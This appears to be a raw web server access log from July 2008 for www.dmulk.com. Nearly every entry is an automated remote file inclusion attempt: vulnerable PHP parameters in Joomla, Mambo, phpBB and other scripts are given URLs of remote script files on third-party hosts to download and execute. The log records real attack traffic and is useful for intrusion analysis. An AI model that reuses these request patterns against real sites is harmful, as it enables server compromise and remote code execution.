72.29.64.215 - - [06/Jul/2008:09:48:59 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:49:11 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:49:21 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:49:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:49:59 -0700] "GET /port.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:49:59 -0700] "GET /logs/access_080215.log/port.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:50:00 -0700] "GET /logs/access_080207.log/port.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:50:00 -0700] "GET /logs/port.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:50:24 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:51:12 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:51:13 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:51:13 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:51:14 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:51:14 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:51:15 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:51:45 -0700] "GET /logs/access_080207.log/errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:51:46 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:51:46 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:51:59 -0700] "GET /logs/access_071130.log//index.php?seite=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:52:00 -0700] "GET /logs//index.php?seite=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:52:02 -0700] "GET //index.php?seite=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.47 - - [06/Jul/2008:09:52:25 -0700] "GET /logs/index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.185.237.47 - - [06/Jul/2008:09:52:25 -0700] "GET /index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
189.62.145.42 - - [06/Jul/2008:09:52:35 -0700] "GET /errors.php?error=http://emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
189.62.145.42 - - [06/Jul/2008:09:52:35 -0700] "GET /logs/errors.php?error=http://emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:09:52:37 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:52:37 -0700] "GET /logs/access_080128.log//index.php?seite=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:09:52:39 -0700] "GET /logs/index.php?place=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:09:52:43 -0700] "GET /index.php?place=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.810" "www.dmulk.com"
59.106.19.69 - - [06/Jul/2008:09:53:32 -0700] "GET /logs/errors.php?error=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
59.106.19.69 - - [06/Jul/2008:09:53:32 -0700] "GET /errors.php?error=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:53:55 -0700] "GET /logs/access_071230.log//index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:53:59 -0700] "GET //index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 200 18423 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:54:01 -0700] "GET /logs//index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.238.16 - - [06/Jul/2008:09:54:10 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:09:54:11 -0700] "GET /logs/access_071230.log/index.php?lang=en&page=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:09:54:18 -0700] "GET /index.php?lang=en&page=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 200 18487 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:54:19 -0700] "GET /*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:09:54:24 -0700] "GET /logs/index.php?lang=en&page=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:54:42 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:54:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:54:42 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:54:50 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:54:50 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:54:50 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.34.67 - - [06/Jul/2008:09:54:55 -0700] "GET /logs/access_080121.log//components/com_forum/download.php?phpbb_root_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:55:08 -0700] "GET /logs/access_080507.log/main.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:55:09 -0700] "GET /logs/main.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:55:14 -0700] "GET /logs/access_080507.log/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:14 -0700] "GET /logs/access_071230.log//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:14 -0700] "GET /logs/access_071230.log//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:14 -0700] "GET /logs/access_071230.log//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:55:15 -0700] "GET /home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:55:17 -0700] "GET /logs/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:17 -0700] "GET //index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:17 -0700] "GET //index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:17 -0700] "GET //index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:17 -0700] "GET /logs//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:17 -0700] "GET /logs//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:55:17 -0700] "GET /logs//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:55:25 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:55:30 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:55:48 -0700] "GET /logs/access_080304.log/main.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:55:57 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:09:55:58 -0700] "GET ///com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:56:19 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:56:19 -0700] "GET /logs/access_080225.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:09:56:25 -0700] "GET ///com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:09:57:15 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:09:57:33 -0700] "GET /logs///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:09:57:33 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:57:45 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://latinvidz.com/Joomla/media/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:57:45 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://latinvidz.com/Joomla/media/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:57:46 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://latinvidz.com/Joomla/media/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:57:54 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://latinvidz.com/Joomla/media/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:58:04 -0700] "GET /logs/access_080316.log/index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:58:05 -0700] "GET /index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:58:05 -0700] "GET /logs/index2.php?DoAction=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:09:58:07 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:09:58:08 -0700] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:58:21 -0700] "GET /logs/index2.php?c=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:58:21 -0700] "GET /logs/access_080128.log/index2.php?c=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:58:21 -0700] "GET /index2.php?c=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:09:58:40 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:09:58:50 -0700] "GET /logs/access_080225.log/include.php?path[docroot]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:09:58:50 -0700] "GET /include.php?path[docroot]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:09:58:50 -0700] "GET /logs/include.php?path[docroot]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:58:51 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:58:51 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.19.130.218 - - [06/Jul/2008:09:58:52 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.19.130.218 - - [06/Jul/2008:09:58:54 -0700] "GET //index.php?option=com_custompages&cpage=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 200 18463 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:58:59 -0700] "GET /logs/access.log//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:58:59 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:59:00 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:59:01 -0700] "GET /logs/access.log//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:59:01 -0700] "GET /logs/access.log//index.php?lang=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:09:59:13 -0700] "GET /logs/access_080207.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:09:59:13 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:59:14 -0700] "GET /logs/access_080507.log/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:59:17 -0700] "GET /home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.112 - - [06/Jul/2008:09:59:21 -0700] "GET /logs/access_080229.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:59:26 -0700] "GET /logs/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:59:28 -0700] "GET /logs/access_080205.log/index2.php?c=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:09:59:40 -0700] "GET /logs/access_080313.log/include.php?path[docroot]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:59:45 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:59:45 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:59:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:59:47 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:59:47 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:59:47 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:10:00:00 -0700] "GET /main.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:00:04 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
